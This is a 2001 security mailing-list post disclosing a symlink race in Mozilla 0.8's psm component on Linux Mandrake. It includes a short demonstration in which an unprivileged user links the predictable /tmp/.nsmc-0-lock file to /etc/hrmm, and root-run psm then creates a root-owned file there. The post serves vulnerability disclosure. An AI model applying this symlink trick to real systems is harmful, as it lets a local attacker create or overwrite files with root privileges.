Mozilla personal security manager /tmp issues

From: KF (dotslash@snosoft.com)
Date: 12/26/01


Date: Wed, 26 Dec 2001 12:50:59 -0500
From: KF <dotslash@snosoft.com>
To: vuln-dev@securityfocus.com

Playing with /tmp a bit this morning I ran into the following issue in
mozilla...

*with mozilla open

[root@linuxppc root]# fuser -n file /tmp/.nsmc-0-lock
/tmp/.nsmc-0-lock: 3220 3223 3224 3226 3227 3228 3229
[root@linuxppc root]# ps -ef | grep 3220
root 3220 1 0 12:42 ? 00:00:00 ./psm

sh-2.05$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody)
sh-2.05$ ln -s /etc/hrmm /tmp/.nsmc-0-lock
sh-2.05$ ls -al /etc/hrmm
ls: /etc/hrmm: No such file or directory

*wait for root to go to https://www.securepage.com to view his banking
info.

sh-2.05$ ls -al /etc/hrmm
-rw------- 1 root root 0 Dec 26 12:42 /etc/hrmm

Lets see what happened here.... when root went to the secure page
mozilla calls /usr/lib/mozilla/psm

root 3220 1 1 12:42 ? 00:00:00 ./psm
root 3223 3220 0 12:42 ? 00:00:00 ./psm
root 3224 3223 0 12:42 ? 00:00:00 ./psm
root 3226 3223 0 12:42 ? 00:00:00 ./psm
root 3227 3223 0 12:42 ? 00:00:00 ./psm
root 3228 3223 0 12:42 ? 00:00:00 ./psm
root 3229 3223 0 12:42 ? 00:00:00 ./psm

[root@linuxppc root]# strings /usr/lib/mozilla/psm | grep /tmp/.
/tmp/.nsmc-%d-lock
/tmp/.nsmc-%d

Above is how we ended up with /etc/hrmm....

And of course here is my version info.[root@linuxppc root]# rpm -qa |
grep mozilla
Help -> about mozilla says...

  Mozilla 0.8 <http://www.mozilla.org/releases/>
  
Mozilla/5.0 (X11; U; Linux 2.4.4-6.2mdk ppc; en-US; 0.8) Gecko/20010814

mozilla-psm-0.8-7.1mdk
mozilla-irc-0.8-7.1mdk
mozilla-0.8-7.1mdk
mozilla-mail-0.8-7.1mdk
nautilus-mozilla-1.0.1.1-5mdk

[root@linuxppc root]# cat /etc/redhat-release
Linux Mandrake release 8.0 (Traktopel) for ppc

*Happy new year@##$~!

-KF



Relevant Pages